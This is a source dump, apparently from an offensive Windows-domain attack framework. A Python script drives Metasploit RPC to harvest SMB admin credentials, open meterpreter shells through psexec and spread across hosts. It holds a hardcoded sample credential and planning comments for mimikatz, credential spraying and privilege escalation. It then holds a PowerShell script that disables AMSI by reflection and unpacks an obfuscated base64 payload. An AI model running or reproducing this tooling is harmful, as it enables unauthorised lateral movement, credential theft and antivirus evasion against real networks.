1163 | async def remove_pending_ip(lock, ip, domain_data):
1164 | with await lock:
1165 | if ip in domain_data['pending_shell_ips']:
1166 | domain_data['pending_shell_ips'].remove(ip)
1167 |
1168 | async def parse_psexec_psh(lock, c_id, err, cmd, output, domain_data):
1169 | user = None
1170 |
1171 | for l in cmd.splitlines():
1172 | if 'RHOST' in l:
1173 | ip = l.split()[-1]
1174 |
1175 | # If run_psexec_psh fails then remove the IP from pending_shell_ips
1176 | if not output:
1177 | await remove_pending_ip(lock, ip, domain_data)
1178 |
1179 | elif err:
1180 | await remove_pending_ip(lock, ip, domain_data)
1181 |
1182 | else:
1183 | for l in output.splitlines():
1184 | l = l.strip().decode('utf8')
1185 | if 'smbuser =>' in l:
1186 | user = l.split()[-1]
1187 | elif '[*] Meterpreter session ' in l:
1188 | l_split = l.split()
1189 | ip = l_split[7][:-1].split(':')[0]
1190 | print_good('Successfully opened new shell with admin [{}] on [{}]'.format(user, ip), 'Console', c_id)
1191 | elif 'no session was created' in l:
1192 | await remove_pending_ip(lock, ip, domain_data)
1193 |
1194 | async def create_user_pwd_creds(lock, user, pwd, dom, domain_data):
1195 | '''Parse out the username and domain
1196 | When PTH with RID 500, the domain will just say "."
1197 | user_pwd is what we print, creds is what we use in domain_data
1198 | This is necessary to preserve hashdumped creds' RID number'''
1199 | if dom != '.':
1200 | dom_user = dom+'\\'+user
1201 | creds = dom_user+':'+pwd
1202 | user_pwd = creds
1203 |
1204 | # PTH user
1205 | else:
1206 | with await lock:
1207 | for c in domain_data['creds']:
1208 | if user in c and pwd in c:
1209 | user_pwd = user+':'+pwd
1210 | creds = c
1211 |
1212 | return user_pwd, creds
1213 |
1214 | async def parse_smb_login(lock, c_id, output, domain_data):
1215 |
1216 | user = None
1217 | pwd = None
1218 | dom = None
1219 | user_pwd = None
1220 | creds = None
1221 | admin_found = False
1222 |
1223 | if output:
1224 | out_split = output.splitlines()
1225 | else:
1226 | return
1227 |
1228 | for l in out_split:
1229 | l = l.strip().decode('utf8')
1230 |
1231 | if 'smbuser' in l:
1232 | user = l.split()[-1]
1233 | if 'smbpass' in l:
1234 | pwd = l.split()[-1]
1235 | if 'smbdomain' in l:
1236 | dom = l.split()[-1].lower()
1237 |
1238 | if user and pwd and dom:
1239 | user_pwd, creds = await create_user_pwd_creds(lock, user, pwd, dom, domain_data)
1240 |
1241 | if '- Success: ' in l:
1242 |
1243 | if not creds:
1244 | print_bad('Found successful login, but unable to parse domain, user and password', 'Console', c_id)
1245 | print_bad(' '+l, 'Console', c_id)
1246 |
1247 | ip_port = l.split()[1]
1248 | ip = ip_port.split(':')[0]
1249 | admin_str = "' Administrator"
1250 | if l.endswith(admin_str):
1251 |
1252 | if ip in domain_data['domain_controllers']:
1253 | print_great('Admin credentials found against [{}] domain controller! [{}]'.format(ip, user_pwd),
1254 | None, None)
1255 | # end_script()
1256 |
1257 | # IP will only be in there if the creds are admin on the box
1258 | # checked_creds is only appended to by spread() future
1259 | if ip in domain_data['checked_creds'][creds]:
1260 | continue
1261 |
1262 | domain_data['checked_creds'][creds].append(ip)
1263 | print_good('Admin login found! [{} - {}]'.format(ip, user_pwd), 'Console', c_id)
1264 | admin_found = True
1265 |
1266 | else:
1267 | print_info('Non-admin login found [{} - {}]'.format(ip, user_pwd), 'Console', c_id)
1268 |
1269 | if not admin_found:
1270 | if user_pwd:
1271 | print_bad('No admin logins found with [{}]'.format(user_pwd), 'Console', c_id)
1272 | else:
1273 | print_bad('Failed to parse smb_login output', 'Console', c_id)
1274 |
1275 | def create_hostsfile(dom_data_copy, filename, domain_data_key):
1276 |
1277 | identifier = ''.join(random.choice(string.ascii_letters) for x in range(7))
1278 | fname = '{}-{}.txt'.format(filename, identifier)
1279 | with open(fname, 'w') as f:
1280 | for ip in dom_data_copy[domain_data_key]:
1281 | f.write(ip+'\n')
1282 |
1283 | return 'file:'+os.getcwd()+'/'+fname
1284 |
1285 | async def attack(lock, client, sess_num, sess_data, domain_data):
1286 |
1287 | # Is admin
1288 | if sess_data[sess_num][b'admin_shell'] == b'True':
1289 | # mimikatz, spray, PTH RID 500
1290 | await get_passwords(lock, client, sess_num, sess_data, domain_data)
1291 |
1292 | # Not admin
1293 | elif sess_data[sess_num][b'admin_shell'] == b'False':
1294 | # Domain joined
1295 |
1296 | if sess_data[sess_num][b'local_admin'] == b'False':
1297 | # Give up
1298 | pass
1299 |
1300 | # START ATTACKING! FINALLY!
1301 | # not domain joined and not admin
1302 | # fuck it?
1303 | # not domain joined but admin
1304 | # mimikatz
1305 | # domain joined and not admin
1306 | # GPP privesc
1307 | # Check for seimpersonate
1308 | # Check for dcsync
1309 | # userhunter
1310 | # spray and pray
1311 | # domain joined and admin
1312 | # GPP
1313 | # userhunter
1314 | # spray and pray
1315 |
1316 |
1317 |
1318 | def get_output(client, sess_num):
1319 | sess_num_str = str(sess_num)
1320 | output = client.call('session.meterpreter_read', [sess_num_str])
1321 |
1322 | # Everythings fine
1323 | if b'data' in output:
1324 | return (output[b'data'], None)
1325 |
1326 | # Got an error from the client.call
1327 | elif b'error_message' in output:
1328 | decoded_err = output[b'error_message'].decode('utf8')
1329 | return (None, decoded_err)
1330 |
1331 | def get_output_errors(output, cmd):
1332 |
1333 | script_errors = [b'[-] post failed',
1334 | b'error in script',
1335 | b'operation failed',
1336 | b'unknown command',
1337 | b'operation timed out',
1338 | b'unknown session id',
1339 | b'error running',
1340 | b'failed to load extension',
1341 | b'requesterror',
1342 | b'is not a valid option for this module',
1343 | b'is not recognized as an',
1344 | b'exploit failed: rex::',
1345 | b'error: + fullyqualifiederrorid : ']
1346 | err = None
1347 |
1348 | # Got an error from output
1349 | if any(x in output.lower() for x in script_errors):
1350 | err = 'Command [{}] failed with error: {}'.format(cmd.splitlines()[0], output.decode('utf8').strip())
1351 |
1352 | return err
1353 |
1354 | def error_printing(sess_num, sess_data, err, cmd):
1355 | ''' We have to handle powershell errors a lot different than regular MSF error '''
1356 | no_print_errs = ['powershell_execute: operation failed: 2148734468',
1357 | 'error running command powershell_execute: rex::timeouterror operation timed out']
1358 | allowed_to_timeout = ['find-domainuserlocation', 'rm "']
1359 |
1360 | if not any(e in err.lower() for e in no_print_errs):
1361 | # Find-DomainUserLocation and "rm" are allowed to timeout
1362 | # don't print it or add the error to the session
1363 | if 'Command [' in err and '] timed out' in err:
1364 | if any(x in cmd.lower() for x in allowed_to_timeout):
1365 | return
1366 |
1367 | # An error occurred which is not present in no_print_errs
1368 | sess_data[sess_num][b'errors'].append(err)
1369 | print_bad(err, 'Session', sess_num)
1370 |
1371 | # We found of the no print errors but it's for the check to see if the long running
1372 | # psh command finished which we expect will error if first psh command isn't done
1373 | else:
1374 | if 'find-domainuserlocation >' in cmd.lower():
1375 | if no_print_errs[0] in err:
1376 | sess_data[sess_num][b'errors'].append(err)
1377 | print_bad(err, 'Session', sess_num)
1378 |
1379 | async def run_session_cmd(client, sess_num, sess_data, cmd, end_strs, api_call='run_single', timeout=60):
1380 |
1381 | err = None
1382 | output = None
1383 | error_msg = 'Error in session {}: {}'
1384 | sess_num_str = str(sess_num)
1385 |
1386 | print_info('Running [{}]'.format(cmd.strip()), 'Session', sess_num)
1387 |
1388 | res = client.call('session.meterpreter_{}'.format(api_call), [str(sess_num), cmd])
1389 | long_running_psh = ['Find-DomainUserLocation']
1390 |
1391 | # Error from MSF API
1392 | if b'error_message' in res:
1393 | err_msg = res[b'error_message'].decode('utf8')
1394 | print_bad(error_msg.format(sess_num_str, err_msg), 'Session', sess_num)
1395 | sess_data[sess_num][b'errors'].append(err_msg)
1396 | return (None, err_msg)
1397 |
1398 | # Successfully completed MSF API call
1399 | elif res[b'result'] == b'success':
1400 |
1401 | counter = 0
1402 | sleep_secs = 1
1403 | full_output = b''
1404 |
1405 | try:
1406 | num_es = 1
1407 | while True:
1408 | await asyncio.sleep(sleep_secs)
1409 |
1410 | output, err = get_output(client, sess_num)
1411 | if output:
1412 | full_output += output
1413 |
1414 | # Error from meterpreter console
1415 | if err:
1416 | sess_data[sess_num][b'errors'].append(err)
1417 | print_bad('Meterpreter error: {}'.format(err), 'Session', sess_num)
1418 | break
1419 |
1420 | # Check for errors from cmd's output
1421 | err = get_output_errors(full_output, cmd)
1422 | if err:
1423 | error_printing(sess_num, sess_data, err, cmd)
1424 | break
1425 |
1426 | # If no terminating string specified just wait til timeout
1427 | counter += sleep_secs
1428 | if counter > timeout:
1429 | err = 'Command [{}] timed out'.format(cmd.strip())
1430 | error_printing(sess_num, sess_data, err, cmd)
1431 | break
1432 |
1433 | # Successfully completed - this section can probably be cleaned up
1434 | if end_strs:
1435 | if any(end_strs in output for end_strs in end_strs):
1436 | break
1437 |
1438 | # If no end_strs specified just return once we have any data or until timeout
1439 | else:
1440 | if len(full_output) > 0:
1441 | break
1442 |
1443 | # This usually occurs when the session suddenly dies or user quits it
1444 | except Exception as e:
1445 | # Get the last of the data to clear the buffer
1446 | clear_buffer = client.call('session.meterpreter_read', [sess_num_str])
1447 | err = 'exception below likely due to abrupt death of session'
1448 | print_bad(error_msg.format(sess_num_str, err), 'Session', sess_num)
1449 | print_bad(' '+str(e), None, None)
1450 | sess_data[sess_num][b'errors'].append(err)
1451 | debug_info(full_output, 'Session', sess_num)
1452 | return (full_output, err)
1453 |
1454 | # b'result' not in res, b'error_message' not in res, just catch everything else as an error
1455 | else:
1456 | err = res[b'result'].decode('utf8')
1457 | sess_data[sess_num][b'errors'].append(err)
1458 | print_bad(res[b'result'].decode('utf8'), 'Session', sess_num)
1459 |
1460 | # Get the last of the data to clear the buffer
1461 | clear_buffer = client.call('session.meterpreter_read', [sess_num_str])
1462 |
1463 | debug_info(full_output, 'Session', sess_num)
1464 |
1465 | return (full_output, err)
1466 |
1467 | def get_perm_token(client):
1468 | # Authenticate and grab a permanent token
1469 | try:
1470 | client.login(args.username, args.password)
1471 | except msfrpc.MsfAuthError:
1472 | print_bad('Authentication to the MSF RPC server failed, are you sure you have the right password?', None, None)
1473 | client.call('auth.token_add', ['123'])
1474 | client.token = '123'
1475 | return client
1476 |
1477 | def is_session_broken(lock, sess_num, sess_data):
1478 | if b'errors' in sess_data[sess_num]:
1479 |
1480 | # Session timed out on initial sysinfo cmd
1481 | if b'user' not in sess_data[sess_num]:
1482 | return True
1483 |
1484 | # Session abruptly died
1485 | msgs = ['abrupt death of session', 'unknown session id']
1486 | #with await lock:
1487 | for err in sess_data[sess_num][b'errors']:
1488 | if len([m for m in msgs if m in err.lower()]) > 0:
1489 | return True
1490 |
1491 | # Session timed out
1492 | if 'Rex::TimeoutError' in sess_data[sess_num][b'errors']:
1493 | return True
1494 |
1495 | return False
1496 |
1497 | async def add_session_keys(msf_sess, sess_data, msf_sess_num):
1498 | for k in sess_data[msf_sess_num]:
1499 | if k not in msf_sess:
1500 | msf_sess[k] = sess_data[msf_sess_num].get(k)
1501 |
1502 | return session
1503 |
1504 | async def get_sessions(lock, client, domain_data, sess_data):
1505 | print_waiting = True
1506 | sleep_secs = 2
1507 |
1508 | ## exists for potential debug purposes ##
1509 | counter = 0
1510 | if counter > 30:
1511 | # Yes this is public information but just here for debugging
1512 | domain_data['creds'].append('lab2\\dan.da:Qwerty1da')
1513 |
1514 | while True:
1515 | # Get list of MSF sessions from RPC server
1516 | msf_sessions = client.call('session.list')
1517 |
1518 | for msf_sess_num in msf_sessions:
1519 | # Do stuff with session
1520 | if msf_sess_num not in sess_data:
1521 | update_session(msf_sessions[msf_sess_num], msf_sess_num, sess_data)
1522 | print_waiting = False
1523 |
1524 | # Attack!
1525 | asyncio.ensure_future(attack_with_session(lock,
1526 | client,
1527 | msf_sess_num,
1528 | sess_data,
1529 | domain_data))
1530 |
1531 | busy_sess = False
1532 | with await lock:
1533 | for n in sess_data:
1534 | if b'busy' in sess_data[n]:
1535 | if sess_data[n][b'busy'] == b'True':
1536 | busy_sess = True
1537 | print_waiting = True
1538 | break
1539 |
1540 | if busy_sess == False:
1541 | if print_waiting:
1542 | print_waiting = False
1543 | print_info('Waiting on new meterpreter session', None, None)
1544 |
1545 | await asyncio.sleep(1)
1546 |
1547 | counter += 1 # here for potential debug purposes
1548 |
1549 | def parse_nmap_xml():
1550 | hosts = []
1551 | try:
1552 | report = NmapParser.parse_fromfile(args.xml)
1553 | for host in report.hosts:
1554 | if host.is_up():
1555 | for s in host.services:
1556 | if s.port == 445:
1557 | if s.state == 'open':
1558 | host = host.address
1559 | if host not in hosts:
1560 | hosts.append(host)
1561 | except FileNotFoundError:
1562 | print_bad('Host file not found: {}'.format(args.xml), None, None)
1563 | sys.exit()
1564 |
1565 | return hosts
1566 |
1567 | def parse_host_list():
1568 | hosts = []
1569 | try:
1570 | with open(args.hostlist, 'r') as hostlist:
1571 | host_lines = hostlist.readlines()
1572 | for line in host_lines:
1573 | line = line.strip()
1574 | try:
1575 | if '/' in line:
1576 | hosts += [str(ip) for ip in IPNetwork(line)]
1577 | elif '*' in line:
1578 | print_bad('CIDR notation only in the host list, e.g. 10.0.0.0/24', None, None)
1579 | sys.exit()
1580 | else:
1581 | hosts.append(line)
1582 | except (OSError, AddrFormatError):
1583 | print_bad('Error importing host list file. Are you sure you chose the right file?', None, None)
1584 | sys.exit()
1585 | except FileNotFoundError:
1586 | print_bad(args.hostlist+' not found', None, None)
1587 | sys.exit()
1588 |
1589 | return hosts
1590 |
1591 | def parse_hosts(domain_data):
1592 | hosts = []
1593 |
1594 | if args.xml:
1595 | hosts = parse_nmap_xml()
1596 |
1597 | elif args.hostlist:
1598 | hosts = parse_host_list()
1599 |
1600 | domain_data['hosts'] = hosts
1601 |
1602 | async def attack_with_session(lock, client, sess_num, sess_data, domain_data):
1603 |
1604 | task = await sess_first_check(lock, client, sess_num, sess_data, domain_data)
1605 | if task:
1606 | await asyncio.wait(task)
1607 |
1608 | if is_session_broken(lock, sess_num, sess_data) == False:
1609 | await attack(lock, client, sess_num, sess_data, domain_data)
1610 |
1611 | def main():
1612 |
1613 | lock = asyncio.Lock()
1614 | client = Msfrpc({})
1615 | sess_data = {}
1616 | # domain_data = {'domain':[domain_admins]}
1617 | domain_data = {'domains':{},
1618 | 'domain_admins':[],
1619 | 'high_priority_ips':[],
1620 | 'pending_shell_ips':[],
1621 | 'creds':[],
1622 | 'checked_creds':{},
1623 | 'hosts':[]}
1624 |
1625 | if args.hostlist or args.xml:
1626 | parse_hosts(domain_data)
1627 |
1628 | try:
1629 | client = get_perm_token(client)
1630 | except:
1631 | print_bad('Failed to connect to MSF RPC server,'
1632 | ' are you sure metasploit is running and you have the right password?',
1633 | None, None)
1634 | sys.exit()
1635 |
1636 | c_ids = get_console_ids(client)
1637 | lhost = get_local_ip(get_iface())
1638 |
1639 | loop = asyncio.get_event_loop()
1640 | loop.add_signal_handler(signal.SIGINT, kill_tasks)
1641 |
1642 | fut_get_sessions = asyncio.ensure_future(get_sessions(lock,
1643 | client,
1644 | domain_data,
1645 | sess_data))
1646 |
1647 |
1648 | fut_spread = asyncio.ensure_future(spread(lock,
1649 | client,
1650 | c_ids,
1651 | lhost,
1652 | sess_data,
1653 | domain_data))
1654 |
1655 | try:
1656 | loop.run_until_complete(asyncio.gather(fut_get_sessions, fut_spread))
1657 | except asyncio.CancelledError:
1658 | print_info('Tasks gracefully smited.', None, None)
1659 | finally:
1660 | loop.close()
1661 |
1662 | if __name__ == "__main__":
1663 | args = parse_args()
1664 | # if os.geteuid():
1665 | # print_bad('Run as root', None, None)
1666 | # sys.exit()
1667 | main()
1668 |
1669 | ## Left off
1670 | #599
1671 |
--------------------------------------------------------------------------------
/scripts/obf-pview.ps1:
--------------------------------------------------------------------------------
1 | Try
2 | {
3 | [Ref].Assembly.GetType('Sys'+'tem.Mana'+'gement.Aut'+'omatio'+'n.Am'+'siUtils').GetField('am'+'siInitFai'+'led','NonP'+'ublic,Static').SetValue($null,$true)
4 | }
5 | Catch
6 | {}
7 | (NeW-object SYstEM.iO.coMPREssIoN.defLAtEstrEAm([sYsTem.IO.MEMORYSTrEam] [sySteM.ConvErt]::FrOMBaSe64String( '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